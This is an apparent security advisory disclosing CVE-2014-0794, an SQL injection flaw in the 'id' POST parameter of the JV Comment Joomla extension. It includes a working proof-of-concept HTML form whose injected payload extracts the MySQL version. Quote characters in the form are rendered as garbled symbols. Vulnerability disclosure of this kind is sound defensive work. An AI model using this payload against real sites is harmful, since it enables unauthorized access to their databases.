High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
- SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of βidβ HTTP POST parameter passed to β/index.phpβ script. A remote authenticated attacker can execute arbitrary SQL commands in applicationβs database.
The following exploitation example displays version of MySQL database:
<form action=βhttp://[host]/index.phpβ method=βpostβ name=βmainβ>
<input type=βhiddenβ name=βoptionβ value=βcom_jvcommentβ>
<input type=βhiddenβ name=βtaskβ value=βcomment.likeβ>
<input type=βhiddenβ name=βidβ value=β1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))β>
<input type=βsubmitβ id=βbtnβ>
</form>